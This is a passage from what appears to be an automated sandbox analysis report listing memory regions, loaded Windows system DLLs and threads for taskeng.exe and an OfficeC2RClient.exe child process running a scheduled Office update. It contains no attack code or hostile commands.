0x8d780d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008d780d0000" filename = "" Region: id = 1631 start_va = 0x8d780e0000 end_va = 0x8d780e1fff entry_point = 0x0 region_type = private name = "private_0x0000008d780e0000" filename = "" Region: id = 1632 start_va = 0x7df5ff480000 end_va = 0x7ff5ff47ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff480000" filename = "" Region: id = 1633 start_va = 0x7ff6b4760000 end_va = 0x7ff6b4782fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6b4760000" filename = "" Region: id = 1634 start_va = 0x7ff6b478d000 end_va = 0x7ff6b478efff entry_point = 0x0 region_type = private name = "private_0x00007ff6b478d000" filename = "" Region: id = 1635 start_va = 0x7ff6b478f000 end_va = 0x7ff6b478ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6b478f000" filename = "" Region: id = 1636 start_va = 0x7ff6b53b0000 end_va = 0x7ff6b53fcfff entry_point = 0x7ff6b53b0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 1637 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1638 start_va = 0x8d78220000 end_va = 0x8d7831ffff entry_point = 0x0 region_type = private name = "private_0x0000008d78220000" filename = "" Region: id = 1639 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1640 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1641 start_va = 0x8d78000000 end_va = 0x8d7800ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008d78000000" filename = "" Region: id = 1642 start_va = 0x8d78010000 end_va = 0x8d78016fff entry_point = 0x0 region_type = private name = "private_0x0000008d78010000" filename = "" Region: id = 1643 start_va = 0x8d780f0000 end_va = 0x8d781adfff entry_point = 0x8d780f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1644 start_va = 0x8d781b0000 end_va = 0x8d781b6fff entry_point = 0x0 region_type = private name = "private_0x0000008d781b0000" filename = "" Region: id = 1645 start_va = 0x8d781c0000 end_va = 0x8d781c0fff entry_point = 0x8d781c0000 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 1646 start_va = 0x8d781d0000 end_va = 0x8d781d0fff entry_point = 0x0 region_type = private name = "private_0x0000008d781d0000" filename = "" Region: id = 1647 start_va = 0x8d781e0000 end_va = 0x8d781e0fff entry_point = 0x0 region_type = private name = "private_0x0000008d781e0000" filename = "" Region: id = 1648 start_va = 0x8d78320000 end_va = 0x8d7839ffff entry_point = 0x0 region_type = private name = "private_0x0000008d78320000" filename = "" Region: id = 1649 start_va = 0x8d783a0000 end_va = 0x8d78527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008d783a0000" filename = "" Region: id = 1650 start_va = 0x8d78560000 end_va = 0x8d7856ffff entry_point = 0x0 region_type = private name = "private_0x0000008d78560000" filename = "" Region: id = 1651 start_va = 0x8d78580000 end_va = 0x8d7858ffff entry_point = 0x0 region_type = private name = "private_0x0000008d78580000" filename = "" Region: id = 1652 start_va = 0x8d78590000 end_va = 0x8d78710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008d78590000" filename = "" Region: id = 1653 start_va = 0x8d78720000 end_va = 0x8d787dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008d78720000" filename = "" Region: id = 1654 start_va = 0x7ff6b4660000 end_va = 0x7ff6b475ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6b4660000" filename = "" Region: id = 1655 start_va = 0x7ff6b478b000 end_va = 0x7ff6b478cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6b478b000" filename = "" Region: id = 1656 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1657 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1658 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1659 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1660 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1661 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1662 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1663 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1664 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1665 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1666 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1667 start_va = 0x8d787e0000 end_va = 0x8d7885ffff entry_point = 0x0 region_type = private name = "private_0x0000008d787e0000" filename = "" Region: id = 1668 start_va = 0x7ff6b4789000 end_va = 0x7ff6b478afff entry_point = 0x0 region_type = private name = "private_0x00007ff6b4789000" filename = "" Region: id = 1669 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1670 start_va = 0x8d781f0000 end_va = 0x8d781f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008d781f0000" filename = "" Region: id = 1671 start_va = 0x8d78860000 end_va = 0x8d7895ffff entry_point = 0x0 region_type = private name = "private_0x0000008d78860000" filename = "" Region: id = 1672 start_va = 0x8d78960000 end_va = 0x8d78c96fff entry_point = 0x8d78960000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1673 start_va = 0x8d78ca0000 end_va = 0x8d78d1ffff entry_point = 0x0 region_type = private name = "private_0x0000008d78ca0000" filename = "" Region: id = 1674 start_va = 0x8d78d20000 end_va = 0x8d78d9ffff entry_point = 0x0 region_type = private name = "private_0x0000008d78d20000" filename = "" Region: id = 1675 start_va = 0x8d78da0000 end_va = 0x8d78e1ffff entry_point = 0x0 region_type = private name = "private_0x0000008d78da0000" filename = "" Region: id = 1676 start_va = 0x7ff6b4783000 end_va = 0x7ff6b4784fff entry_point = 0x0 region_type = private name = "private_0x00007ff6b4783000" filename = "" Region: id = 1677 start_va = 0x7ff6b4785000 end_va = 0x7ff6b4786fff entry_point = 0x0 region_type = private name = "private_0x00007ff6b4785000" filename = "" Region: id = 1678 start_va = 0x7ff6b4787000 end_va = 0x7ff6b4788fff entry_point = 0x0 region_type = private name = "private_0x00007ff6b4787000" filename = "" Region: id = 1679 start_va = 0x7ffaf1930000 end_va = 0x7ffaf1938fff entry_point = 0x7ffaf1930000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1680 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1681 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1682 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1683 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Thread: id = 173 os_tid = 0xf60 Thread: id = 174 os_tid = 0xf5c Thread: id = 175 os_tid = 0xf54 Thread: id = 176 os_tid = 0xf58 Thread: id = 177 os_tid = 0xf9c Thread: id = 178 os_tid = 0xee0 Thread: id = 179 os_tid = 0xefc Thread: id = 180 os_tid = 0xf04 Process: id = "10" image_name = "officec2rclient.exe" filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe" page_root = "0x7cce4000" os_pid = "0xf00" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xf64" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /frequentupdate SCHEDULEDTASK displaylevel=False" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b566" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1684 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1685 start_va = 0xdef5c50000 end_va = 0xdef5c6ffff entry_point = 0x0 region_type = private name = "private_0x000000def5c50000" filename = "" Region: id = 1686 start_va = 0xdef5c70000 end_va = 0xdef5c83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def5c70000" filename = "" Region: id = 1687 start_va = 0xdef5c90000 end_va = 0xdef5d8ffff entry_point = 0x0 region_type = private name = "private_0x000000def5c90000" filename = "" Region: id = 1688 start_va = 0x7df5ff100000 end_va = 0x7ff5ff0fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff100000" filename = "" Region: id = 1689 start_va = 0x7ff726b30000 end_va = 0x7ff726b52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff726b30000" filename = "" Region: id = 1690 start_va = 0x7ff726b5b000 end_va = 0x7ff726b5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff726b5b000" filename = "" Region: id = 1691 start_va = 0x7ff726b5e000 end_va = 0x7ff726b5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff726b5e000" filename = "" Region: id = 1692 start_va = 0x7ff727850000 end_va = 0x7ff728f73fff entry_point = 0x7ff727850000 region_type = mapped_file name = "officec2rclient.exe" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe") Region: id = 1693 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1694 start_va = 0xdef5d90000 end_va = 0xdef5d93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def5d90000" filename = "" Region: id = 1695 start_va = 0xdef5da0000 end_va = 0xdef5da0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def5da0000" filename = "" Region: id = 1696 start_va = 0xdef5db0000 end_va = 0xdef5db1fff entry_point = 0x0 region_type = private name = "private_0x000000def5db0000" filename = "" Region: id = 1697 start_va = 0xdef5ed0000 end_va = 0xdef5fcffff entry_point = 0x0 region_type = private name = "private_0x000000def5ed0000" filename = "" Region: id = 1698 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1699 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1700 start_va = 0xdef5c50000 end_va = 0xdef5c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def5c50000" filename = "" Region: id = 1701 start_va = 0xdef5c60000 end_va = 0xdef5c66fff entry_point = 0x0 region_type = private name = "private_0x000000def5c60000" filename = "" Region: id = 1702 start_va = 0xdef5dc0000 end_va = 0xdef5e7dfff entry_point = 0xdef5dc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1703 start_va = 0xdef5fd0000 end_va = 0xdef60cffff entry_point = 0x0 region_type = private name = "private_0x000000def5fd0000" filename = "" Region: id = 1704 start_va = 0x7ff726a30000 end_va = 0x7ff726b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff726a30000" filename = "" Region: id = 1705 start_va = 0x7ff726b5c000 end_va = 0x7ff726b5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff726b5c000" filename = "" Region: id = 1706 start_va = 0x7ffaded70000 end_va = 0x7ffadee0dfff entry_point = 0x7ffaded70000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1707 start_va = 0x7ffaef3e0000 end_va = 0x7ffaef419fff entry_point = 0x7ffaef3e0000 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 1708 start_va = 0x7ffaef420000 end_va = 0x7ffaef4befff entry_point = 0x7ffaef420000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 1709 start_va = 0x7ffaef4c0000 end_va = 0x7ffaef4d5fff entry_point = 0x7ffaef4c0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 1710 start_va = 0x7ffaef4e0000 end_va = 0x7ffaef506fff entry_point = 0x7ffaef4e0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1711 start_va = 0x7ffaf02c0000 end_va = 0x7ffaf03b1fff entry_point = 0x7ffaf02c0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1712 start_va = 0x7ffaf0460000 end_va = 0x7ffaf047efff entry_point = 0x7ffaf0460000 region_type = mapped_file name = "hlink.dll" filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll") Region: id = 1713 start_va = 0x7ffaf0480000 end_va = 0x7ffaf0486fff entry_point = 0x7ffaf0480000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 1714 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1715 start_va = 0x7ffaf2a90000 end_va = 0x7ffaf2ab4fff entry_point = 0x7ffaf2a90000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1716 start_va = 0x7ffaf2ac0000 end_va = 0x7ffaf2ae5fff entry_point = 0x7ffaf2ac0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1717 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1718 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1719 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1720 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1721 start_va = 0x7ffaf44e0000 end_va = 0x7ffaf4533fff entry_point = 0x7ffaf44e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1722 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1723 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1724 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1725 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1726 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1727 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1728 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1729 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1730 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1731 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1732 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1733 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1734 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1735 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1736 start_va = 0x7ffaf7690000 end_va = 0x7ffaf7854fff entry_point = 0x7ffaf7690000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1737 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1738 start_va = 0xdef5e80000 end_va = 0xdef5e86fff entry_point = 0x0 region_type = private name = "private_0x000000def5e80000" filename = "" Region: id = 1739 start_va = 0xdef5e90000 end_va = 0xdef5e90fff entry_point = 0x0 region_type = private name = "private_0x000000def5e90000" filename = "" Region: id = 1740 start_va = 0xdef5ea0000 end_va = 0xdef5ea0fff entry_point = 0x0 region_type = private name = "private_0x000000def5ea0000" filename = "" Region: id = 1741 start_va = 0xdef5eb0000 end_va = 0xdef5eb0fff entry_point = 0x0 region_type = private name = "private_0x000000def5eb0000" filename = "" Region: id = 1742 start_va = 0xdef5ec0000 end_va = 0xdef5ec0fff entry_point = 0x0 region_type = private name = "private_0x000000def5ec0000" filename = "" Region: id = 1743 start_va = 0xdef60d0000 end_va = 0xdef618ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def60d0000" filename = "" Region: id = 1744 start_va = 0xdef6190000 end_va = 0xdef619ffff entry_point = 0x0 region_type = private name = "private_0x000000def6190000" filename = "" Region: id = 1745 start_va = 0xdef61b0000 end_va = 0xdef61bffff entry_point = 0x0 region_type = private name = "private_0x000000def61b0000" filename = "" Region: id = 1746 start_va = 0xdef61c0000 end_va = 0xdef6347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def61c0000" filename = "" Region: id = 1747 start_va = 0xdef6350000 end_va = 0xdef64d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000def6350000" filename = "" Region: id = 1748 start_va = 0xdef64e0000 end_va = 0xdef65dffff entry_point = 0x0 region_type = private name = "private_0x000000def64e0000" filename = "" Region: id = 1749 start_va = 0xdef6780000 end_va = 0xdef678ffff entry_point = 0x0 region_type = private name = "private_0x000000def6780000" filename = "" Region: id = 1750 start_va = 0xdef6790000 end_va = 0xdef6ac6fff entry_point = 0xdef6790000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1751 start_va = 0x7ff726b59000 end_va = 0x7ff726b5afff entry_point = 0x0 region_type = private name = "private_0x00007ff726b59000" filename = "" Region: id = 1752 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1753 start_va = 0x7ffaefcd0000 end_va = 0x7ffaf0214fff entry_point = 0x7ffaefcd0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 1754 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1755 start_va = 0x7ffaefc20000 end_va = 0x7ffaefcc9fff entry_point = 0x7ffaefc20000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 1756 start_va = 0xdef6680000 end_va = 0xdef668ffff entry_point = 0x0 region_type = private name = "private_0x000000def6680000" filename = "" Region: id = 1757 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1758 start_va = 0x7ffaf2160000 end_va = 0x7ffaf21fbfff entry_point = 0x7ffaf2160000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 1759 